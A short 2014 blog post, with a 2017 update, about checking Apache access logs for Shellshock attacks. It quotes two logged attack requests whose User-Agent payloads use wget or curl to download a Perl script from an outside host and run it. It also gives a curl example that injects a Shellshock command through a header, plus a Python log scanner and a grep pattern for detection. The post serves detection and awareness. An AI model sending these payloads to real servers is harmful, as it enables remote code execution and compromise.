Are there any shellshock attacks (in Apache access logs)?


Published on September 26th 2014 - Listed in Hacks Linux Shell


Yes, Shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually being used? Do people attack?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.

Update September 22nd 2017: Yes, I know: kind of a late update. However, it is worth mentioning that the Shellshock attack worked at the HTTP header level, too. So even if I couldn't find anything in the access logs (not all headers are logged here), that doesn't mean there were no Shellshock attacks. For example:

$ curl -H "X-Client-Something: Additional Header () { :;}; /bin/bash -c 'whoami'" https://www.example.com
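
Added example, not part of the original post: a small Python scan of Apache access logs for the `() {` prefix seen in the two hits above, reporting which logged field carried it. The sample lines are constructed, and the script assumes Apache's combined log format, so a header that is not written to the log stays invisible to it.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes (\"), as in the hits above.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)

# Bash function-definition prefix used by Shellshock payloads: "() {"
SHELLSHOCK = re.compile(r'\(\)\s*\{')

def find_shellshock(lines):
    """Return (host, time, field, status) for every logged field with the prefix."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            # Unparseable line: match the raw text so nothing is silently skipped
            if SHELLSHOCK.search(line):
                hits.append((None, None, "raw", None))
            continue
        host, when, request, status, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("agent", agent))
        for name, value in fields:
            if SHELLSHOCK.search(value):
                hits.append((host, when, name, int(status)))
    return hits

# Constructed sample lines (documentation IP range, not real traffic)
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '404 224 "-" "() { :;}; /bin/bash -c \'whoami\'"',
    '192.0.2.11 - - [25/Sep/2014:19:50:01 +0200] "GET /index.html HTTP/1.1" '
    '200 1043 "() { :; }; echo" "Mozilla/5.0"',
    # Benign: "()" in a query string without the following "{"
    '192.0.2.12 - - [25/Sep/2014:19:51:13 +0200] "GET /app.js?cb=f() HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, when, field, status in find_shellshock(SAMPLE):
        print(f"{host} [{when}] pattern in {field} (HTTP {status})")
```

The status code in each hit shows whether the probed path existed at all: a 404, as in both hits above, means the request never reached a CGI script.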




Comments (newest first)

Alexander from Zürich wrote on Sep 26th, 2014:

Easy way to grep:

grep -E '.*"\(' access_log